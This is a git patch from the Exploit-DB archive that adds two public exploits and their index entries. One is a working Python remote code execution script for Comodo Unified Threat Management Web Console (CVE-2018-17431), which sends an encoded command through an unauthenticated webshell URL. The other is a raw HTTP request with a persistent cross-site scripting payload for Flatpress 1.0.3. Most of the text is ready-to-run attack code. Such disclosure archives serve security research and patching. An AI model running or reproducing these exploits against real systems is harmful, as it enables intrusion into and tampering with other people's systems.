From 1a8b74a305c893445965269c5a2b60c53fc39e0b Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Wed, 23 Sep 2020 05:02:05 +0000
Subject: [PATCH] DB: 2020-09-23

2 changes to exploits/shellcodes

Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution
Flatpress Add Blog 1.0.3 - Persistent Cross-Site Scripting
---
 exploits/multiple/webapps/48825.py | 50 ++++++++++++++++++++++++++++++
 exploits/php/webapps/48826.txt     | 34 ++++++++++++++++++++
 files_exploits.csv                 |  2 ++
 3 files changed, 86 insertions(+)
 create mode 100755 exploits/multiple/webapps/48825.py
 create mode 100644 exploits/php/webapps/48826.txt

diff --git a/exploits/multiple/webapps/48825.py b/exploits/multiple/webapps/48825.py
new file mode 100755
index 000000000..4acb88eaf
--- /dev/null
+++ b/exploits/multiple/webapps/48825.py
@@ -0,0 +1,50 @@
+# Exploit Title: Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution
+# Date: 2018-08-15
+# Exploit Author: Milad Fadavvi
+# Author's LinkedIn: https://www.linkedin.com/in/fadavvi/
+# Vendor Homepage: https://www.comodo.com/
+# Version: Releases before 2.7.0 & 1.5.0 
+# Tested on: Windows=Firefox/chrome - Kali=firefox
+# PoC & other infos: https://github.com/Fadavvi/CVE-2018-17431-PoC
+# CVE : CVE-2018-17431
+# CVE-detailes: https://nvd.nist.gov/vuln/detail/CVE-2018-17431
+# CVSS 3 score: 9.8 
+
+import requests
+
+def RndInt(Lenght):
+    from random import choice
+    from string import digits
+
+    RandonInt = ''.join([choice(digits) for n in range(Lenght)])
+    return str(RandonInt)
+
+if __name__ == "__main__":
+
+    IP = input("IP: ")
+    Port = input("Port: ")
+
+    Command = '%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a' ## Disable SSH
+    '''For more info about command try to read manual of spesefic version of Comodo UTM and 
+       exploit PoC (https://github.com/Fadavvi/CVE-2018-17431-PoC)
+     '''
+
+    BaseURL = "https://" + IP + ":" + Port + "/manage/webshell/u?s=" + RndInt(1) + "&w=" + RndInt(3) +"&h=" + RndInt(2)
+    BaseNComdURL = BaseURL + "&k=" + Command
+    LastPart = "&l=" + RndInt(2) +"&_=" + RndInt(13) 
+    FullURL = BaseNComdURL + LastPart
+    AddetionalEnter = BaseURL + "&k=%0a" + LastPart
+
+    try:
+        FirstResponse = requests.get(FullURL).text
+    except:
+        print('\nExploit failed due HTTP Error. Check given URL and Port!\n')
+        exit(1)
+    
+    SecondResponse = requests.get(AddetionalEnter).text
+    if SecondResponse.find("Configuration has been altered") == -1:
+        print("\nExploit Failed!\n")
+        exit(1)
+    else:
+        print("\nOK! Command Ran!\n")
+    exit(0)
\ No newline at end of file
diff --git a/exploits/php/webapps/48826.txt b/exploits/php/webapps/48826.txt
new file mode 100644
index 000000000..290d7489a
--- /dev/null
+++ b/exploits/php/webapps/48826.txt
@@ -0,0 +1,34 @@
+# Exploit Title: Flatpress Add Blog 1.0.3 - Persistent Cross-Site Scripting
+# Google Dork: -
+# Date: 2020-09-19
+# Exploit Author: Alperen Ergel
+# Vendor Homepage: https://www.flatpress.org/
+# Software Link: https://github.com/evacchi/flatpress/releases/tag/v1.0.3
+# Version: 1.0.3 
+# Tested on: windows 10 / xampp 
+# CVE : -
+
+
+# Proof Of Content
+
+POST /flatpress/admin.php?p=entry&action=write HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 223
+Origin: http://localhost/
+Connection: close
+Referer: http://localhost/flatpress/admin.php?p=entry&action=write
+Cookie: fpuser_fp-a53f4609=opensourcecms; fppass_fp-a53f4609=79dc9a3c529fcd0d9dc4fc7ff22187b6; fpsess_fp-a53f4609=71v18tu3lsc0s021q2pj8a3je7; _ga=GA1.2.487908813.1600520069; _gid=GA1.2.951134816.1600520069; _gat=1
+Upgrade-Insecure-Requests: 1
+
+_wpnonce=4fc4222db1&_wp_http_referer=%2Fflatpress%2Fadmin.php%3Fp%3Dentry%26action%3Dwrite&subject=XSS&timestamp=1600526382&
+entry=entry200919-143942&attachselect=--&imageselect=--&content=<img src=x onerror='alert("TEST XSS")'/>&savecontinue=Save%26Continue
+
+
+# Snipp
+
+content=[PAYLOAD] //<img src=x onerror='alert("TEST XSS")'/>
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 17720c850..304bf16a4 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -40649,6 +40649,8 @@ id,file,description,date,author,type,platform,port
 48822,exploits/php/webapps/48822.txt,"Seat Reservation System 1.0 - 'id' SQL Injection",2020-09-21,Augkim,webapps,php,
 48823,exploits/hardware/webapps/48823.py,"Mida eFramework 2.9.0 - Back Door Access",2020-09-21,elbae,webapps,hardware,
 48824,exploits/multiple/webapps/48824.py,"B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution",2020-09-21,LiquidWorm,webapps,multiple,
+48825,exploits/multiple/webapps/48825.py,"Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution",2020-09-22,"Milad Fadavvi",webapps,multiple,
+48826,exploits/php/webapps/48826.txt,"Flatpress Add Blog 1.0.3 - Persistent Cross-Site Scripting",2020-09-22,"Alperen Ergel",webapps,php,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,